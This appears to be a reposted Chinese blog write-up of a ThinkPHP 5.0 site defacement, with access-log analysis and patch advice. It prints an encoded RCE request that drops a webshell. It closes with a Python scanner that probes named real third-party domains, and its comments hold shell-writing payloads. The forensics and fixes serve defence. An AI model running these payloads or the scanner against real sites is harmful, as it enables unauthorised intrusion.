昨天晚上,正准备入睡,朋友突然发消息说他的网站被黑客攻击了,首页内容被篡改,于是我开始了紧急的修复工作
知道这个情况后,立即翻身起来,让朋友发给我必要的信息,把网站的日志下载到本地,因为网站本身的访问量不是很大,所以直接使用 notepad++ 来手动分析。
0x01 下载必要文件
首先将日志文件、现在网站空间的源码以及之前的网站备份下载到本地,这一步是为了比较分析。
0x02 日志分析
从网站首页被篡改,可知道攻击者应该拿下了网站的权限,并上传了 webshell,因此从攻击日志中查找网站非常规的访问URL记录。
发现如下的访问日志:
203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:48 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:48 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:48 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //data/cache/asd.php HTTP/1.1" 301 178 "http://pay.top15.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /data/cache/asd.php HTTP/1.1" 404 564 "http://pay.top15.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //plus/result.php HTTP/1.1" 301 178 "http://pay.top15.cn//plus/result.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/result.php HTTP/1.1" 404 564 "http://pay.top15.cn//plus/result.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //plus/read.php HTTP/1.1" 301 178 "http://pay.top15.cn//plus/read.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/read.php HTTP/1.1" 404 564 "http://pay.top15.cn//plus/read.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //data/cache/flye.php HTTP/1.1" 301 178 "http://pay.top15.cn//data/cache/flye.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /data/cache/flye.php HTTP/1.1" 404 564 "http://pay.top15.cn//data/cache/flye.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //plus/moon.php HTTP/1.1" 301 178 "http://pay.top15.cn//plus/moon.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/moon.php HTTP/1.1" 404 564 "http://pay.top15.cn//plus/moon.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //api.php HTTP/1.1" 301 178 "http://pay.top15.cn//api.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /api.php HTTP/1.1" 404 564 "http://pay.top15.cn//api.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //lequ.php HTTP/1.1" 301 178 "http://pay.top15.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /lequ.php HTTP/1.1" 404 564 "http://pay.top15.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //lx.php HTTP/1.1" 301 178 "http://pay.top15.cn//lx.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /lx.php HTTP/1.1" 404 564 "http://pay.top15.cn//lx.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //sb.php HTTP/1.1" 301 178 "http://pay.top15.cn//sb.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /sb.php HTTP/1.1" 404 564 "http://pay.top15.cn//sb.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /install/sss1.php HTTP/1.1" 404 564 "http://pay.top15.cn//install/sss1.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
看到这样的访问日志,很明显这是一个扫描器在扫描网站是否存在 webshell
查询ip:
可知,这是放在服务器上的扫描器
继续往下分析,时间顺序是从上往下增加的。
然后又发现一处集中扫描网站备份文件的日志记录:
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /index.php?s=hits-show&sid=md5(1)%23&type=md5(1) HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /paytop15cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /paytop15cn.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /pay.top15.cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /pay.top15.cn.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.cn.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /wwwtop15.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /wwwtop15.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /www.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /www.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:11 +0800] "HEAD /www.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:11 +0800] "HEAD /www.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
查询IP结果如下:
想不到,小小的站点,攻击的人还挺多的,但是这些扫描基本都是徒劳的,网站上不存在这些内容,所以也不存在什么威胁(之后的几处地方也存在类似的扫描记录,正常访问的用户不多,倒是扫描器挺多的…⊙﹏⊙b汗)
网站的首页被改成了一串中文,那么在访问日志当中应当是存在的
在下载的网站文件/public 目录下,发现如下情况
index.php 和 i.php,乍一看,第二个文件很明显是 webshell 文件,然后到访问日志中,查找 i.php这个关键词
OK,成功定位攻击日志
很明显,攻击者在简单访问几次后,便直接使用了0day攻击,系统基于 ThinkPHP5.0,因此由最近爆出的ThinkPHP几个RCE漏洞,可知攻击者直接利用了该漏洞。
113.103.115.134 - - [15/Feb/2019:17:26:04 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=eval(base64_decode(%27JGYgPSBmb3BlbigiaS5waHAiLCAidyIpOw0KJHQgPSAnPD9waHAgJGEgPSBiYXNlNjRfZGVjb2RlKFwnWVhOelpYSjBcJyk7JGEoJF9SRVFVRVNUW1wnaVwnXSk7Pz4nOw0KZndyaXRlKCRmLCR0KTsNCmZjbG9zZSgkZik7%27)) HTTP/1.1" 500 7345 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"
这个定位不是特别准确,但是也差不了多少了,真人概率 92%,可以确定攻击者使用的应该是自家的电脑。
0x03 修复工作
既然是最新的漏洞攻击,之前也挺热的,毕竟让程序员加班几次了。
关于漏洞的分析,推荐文章《ThinkPHP 5.0 & 5.1远程命令执行漏洞利用分析》
通过该文章的分析,在源码中发现该程序基于 TP5.0,那么修复方法有其一,修改默认的 'var_pathinfo' => 's',把s 修改成复杂的字符串,这个在thinkphp/convention.php文件中
其二,升级官方最新版本
其三,在 thinkphp/library/think/App.php 类的 module 方法的获取控制器的代码后面加上
if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {throw new HttpException(404, 'controller not exists:' . $controller);
}
0x04 写一个EXP:
简单写了一个 exploit :
# -*- coding:utf-8 -*-
# name:tpKiller.py
# author: DYBOY
# description: ThinkPHP5 RCE的POC
# time: 2019-02-16import requests
import re"""
5.0.21,5.0.22:
写shell:http://example.com/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][1]=<?php @assert($_POST);?>5.1.*:
写shell:http://example.com/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php @assert($_POST);?>"""
# 检测存在漏洞的网址列表
target_urls =['http://www.test.com','http://www.meetppt.com','http://www.jiyouche.com','http://www.dfqy.com','http://home.chegouguanjia.com','http://www.aixuetuan.com']# payload列表
poc_list = ['/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1','/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1','/index.php?s=index/\think\Request/input&filter=phpinfo&data=1',]def getHtml(url):"""获取网页内容param: urlreturn str"""html = requests.get(url)html.encoding = 'utf-8'return html.textdef checkBug(url):"""验证是否存在RCE漏洞param: urlreturn None"""for index,poc in enumerate(poc_list):result = getHtml(url+poc)if(result.find('www.php.net') > 0):print("当前URL:"+ url+" 存在ThinkPHP5 RCE 漏洞!\nPOC编号: "+str(index+1))breakdef attack(urlList):"""开始检测param:urls(<type:list>)return None"""for url in urlList:checkBug(url)# 主程序
if __name__ == '__main__':attack(target_urls)0x05 总结
12月份就爆出 ThinkPHP 的 RCE 漏洞,年底,许多公司都在忙着财务、公司年会等事情,缺少了对网站安全的一个检查维护,却不知道,在网上一些“黑客”或者“黑产团队”已经开始了批量获取webshell的入侵等违法活动,因此各大公司或是个人站长,都需要时刻关注互联网安全动态,及时做好安全防护升级工作。
原文地址:https://blog.dyboy.cn/websecurity/108.html
![[ CSOL - CLS ] 活动网站 map area](https://img-blog.csdnimg.cn/20200825135859711.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzI1NzQxMDcx,size_16,color_FFFFFF,t_70#pic_center)
